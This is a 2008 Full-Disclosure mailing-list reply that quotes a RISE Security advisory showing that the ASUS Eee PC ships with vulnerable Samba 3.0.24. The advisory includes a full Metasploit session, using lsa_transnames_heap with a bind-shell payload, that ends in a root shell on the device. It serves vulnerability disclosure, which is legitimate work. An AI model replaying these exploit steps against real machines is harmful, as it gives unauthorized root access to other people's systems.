So you ran metasploit and then made a blog post. Is this what &#39;security research&#39; is considered now? And why did you write this is such a media hyped way? Trying to get some spotlight?<br><br><div class="gmail_quote">
On Feb 8, 2008 10:47 AM, RISE Security &lt;<a href="mailto:advisories@risesecurity.org">advisories@risesecurity.org</a>&gt; wrote:<br><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
-----BEGIN PGP SIGNED MESSAGE-----<br>Hash: SHA1<br><br>We recently acquired an ASUS Eee PC (if you want to know more about it,<br>a lot of reviews are available on internet). The first thing we did when<br>we put our hands at the ASUS Eee PC was to test its security. The ASUS<br>
Eee PC comes with a customized version of Xandros operating system<br>installed, and some other bundled software like Mozilla Firefox, Pidgin,<br>Skype and OpenOffice.org.<br><br>Analysing the running processes of the ASUS Eee PC, the first thing that<br>
caught our attention was the running smbd process (the sshd daemon was<br>started by us, and is not enabled by default).<br><br><br>eeepc-rise:/root&gt; ps -e<br> &nbsp;PID TTY &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;TIME CMD<br> &nbsp; &nbsp;1 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 fastinit<br>
 &nbsp; &nbsp;2 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 ksoftirqd/0<br> &nbsp; &nbsp;3 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 events/0<br> &nbsp; &nbsp;4 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 khelper<br> &nbsp; &nbsp;5 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 kthread<br> &nbsp; 25 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 kblockd/0<br> &nbsp; 26 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 kacpid<br> &nbsp;128 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 ata/0<br>
 &nbsp;129 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 ata_aux<br> &nbsp;130 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 kseriod<br> &nbsp;148 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 pdflush<br> &nbsp;149 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 pdflush<br> &nbsp;150 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 kswapd0<br> &nbsp;151 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 aio/0<br> &nbsp;152 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 unionfs_siod/0<br>
 &nbsp;778 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 scsi_eh_0<br> &nbsp;779 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 scsi_eh_1<br> &nbsp;799 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 kpsmoused<br> &nbsp;819 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 kjournald<br> &nbsp;855 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 fastinit<br> &nbsp;857 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 sh<br> &nbsp;858 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 su<br>
 &nbsp;859 tty3 &nbsp; &nbsp; 00:00:00 getty<br> &nbsp;862 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 startx<br> &nbsp;880 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 xinit<br> &nbsp;881 tty2 &nbsp; &nbsp; 00:00:06 Xorg<br> &nbsp;890 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 udevd<br> &nbsp;952 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 ksuspend_usbd<br> &nbsp;953 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 khubd<br>
&nbsp;1002 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 acpid<br>&nbsp;1027 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 pciehpd_event<br>&nbsp;1055 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 ifplugd<br>&nbsp;1101 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 scsi_eh_2<br>&nbsp;1102 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 usb-storage<br>&nbsp;1151 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 icewm<br>&nbsp;1185 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:01 AsusLauncher<br>
&nbsp;1186 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 icewmtray<br>&nbsp;1188 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:01 powermonitor<br>&nbsp;1190 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 minimixer<br>&nbsp;1191 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 networkmonitor<br>&nbsp;1192 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 wapmonitor<br>&nbsp;1193 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 x-session-manag<br>
&nbsp;1195 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 x-session-manag<br>&nbsp;1200 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 x-session-manag<br>&nbsp;1201 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 dispwatch<br>&nbsp;1217 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 cupsd<br>&nbsp;1224 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 usbstorageapple<br>&nbsp;1234 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 kondemand/0<br>
&nbsp;1240 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 portmap<br>&nbsp;1248 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 keyboardstatus<br>&nbsp;1272 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 memd<br>&nbsp;1279 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 scim-helper-man<br>&nbsp;1280 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 scim-panel-gtk<br>&nbsp;1282 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 scim-launcher<br>
&nbsp;1297 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 netserv<br>&nbsp;1331 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 asusosd<br>&nbsp;1476 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 xandrosncs-agen<br>&nbsp;1775 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 dhclient3<br>&nbsp;2002 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 nmbd<br>&nbsp;2004 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 smbd<br>&nbsp;2005 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 smbd<br>
&nbsp;2322 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 sshd<br>&nbsp;2345 ? &nbsp; &nbsp; &nbsp; &nbsp;00:00:00 sshd<br>&nbsp;2356 pts/0 &nbsp; &nbsp;00:00:00 bash<br>&nbsp;2362 pts/0 &nbsp; &nbsp;00:00:00 ps<br>eeepc-rise:/root&gt;<br><br><br>Retrieving the the smbd version, we discovered that it runs a vulnerable<br>
version of Samba (Samba lsa_io_trans_names Heap Overflow), which exploit<br>we published earlier last year.<br><br><br>eeepc-rise:/root&gt; smbd --version<br>Version 3.0.24<br>eeepc-rise:/root&gt;<br><br><br>With this information, we ran our exploit against the ASUS Eee PC using<br>
the Debian/Ubuntu target (Xandros is based on Corel Linux, which is<br>Debian based).<br><br><br>msf &gt; use linux/samba/lsa_transnames_heap<br>msf exploit(lsa_transnames_heap) &gt; set RHOST <a href="http://192.168.50.10" target="_blank">192.168.50.10</a><br>
RHOST =&gt; <a href="http://192.168.50.10" target="_blank">192.168.50.10</a><br>msf exploit(lsa_transnames_heap) &gt; set PAYLOAD linux/x86/shell_bind_tcp<br>PAYLOAD =&gt; linux/x86/shell_bind_tcp<br>msf exploit(lsa_transnames_heap) &gt; show targets<br>
<br>Exploit targets:<br><br> &nbsp; Id &nbsp;Name<br> &nbsp; -- &nbsp;----<br> &nbsp; 0 &nbsp; Linux vsyscall<br> &nbsp; 1 &nbsp; Linux Heap Brute Force (Debian/Ubuntu)<br> &nbsp; 2 &nbsp; Linux Heap Brute Force (Gentoo)<br> &nbsp; 3 &nbsp; Linux Heap Brute Force (Mandriva)<br> &nbsp; 4 &nbsp; Linux Heap Brute Force (RHEL/CentOS)<br>
 &nbsp; 5 &nbsp; Linux Heap Brute Force (SUSE)<br> &nbsp; 6 &nbsp; Linux Heap Brute Force (Slackware)<br> &nbsp; 7 &nbsp; DEBUG<br><br><br>msf exploit(lsa_transnames_heap) &gt; set TARGET 1<br>TARGET =&gt; 1<br>msf exploit(lsa_transnames_heap) &gt; exploit<br>
[*] Started bind handler<br>[*] Creating nop sled....<br>...<br>[*] Trying to exploit Samba with address 0x08415000...<br>[*] Connecting to the SMB service...<br>[*] Binding to<br>12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...<br>
[*] Bound to<br>12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...<br>[*] Calling the vulnerable function...<br>[+] Server did not respond, this is expected<br>[*] Command shell session 1 opened (<a href="http://192.168.50.201:33694" target="_blank">192.168.50.201:33694</a> -&gt;<br>
<a href="http://192.168.50.10:4444" target="_blank">192.168.50.10:4444</a>)<br>msf exploit(lsa_transnames_heap) &gt; sessions -i 1<br>[*] Starting interaction with 1...<br><br>uname -a<br>Linux eeepc-rise 2.6.21.4-eeepc #21 Sat Oct 13 12:14:03 EDT 2007 i686<br>
GNU/Linux<br>id<br>uid=0(root) gid=0(root) egid=65534(nogroup) groups=65534(nogroup)<br><br><br>Easy to learn, Easy to work, Easy to root.<br><br><br>The original blog post and more information can be found in our<br>website at <a href="http://risesecurity.org/" target="_blank">http://risesecurity.org/</a>.<br>
<br>Best regards,<br>RISE Security<br>-----BEGIN PGP SIGNATURE-----<br>Version: GnuPG v1.2.6 (GNU/Linux)<br><br>iD8DBQFHrIeHhFjK78TGSUERAvq7AJ9iz2sHD4/cQ0CdlCC1axNiVhwmJwCfddEd<br>6tg6XRBCWHfPWFrSdVKu5oA=<br>=OFwe<br>-----END PGP SIGNATURE-----<br>
<br>_______________________________________________<br>Full-Disclosure - We believe in it.<br>Charter: <a href="http://lists.grok.org.uk/full-disclosure-charter.html" target="_blank">http://lists.grok.org.uk/full-disclosure-charter.html</a><br>
Hosted and sponsored by Secunia - <a href="http://secunia.com/" target="_blank">http://secunia.com/</a><br></blockquote></div><br>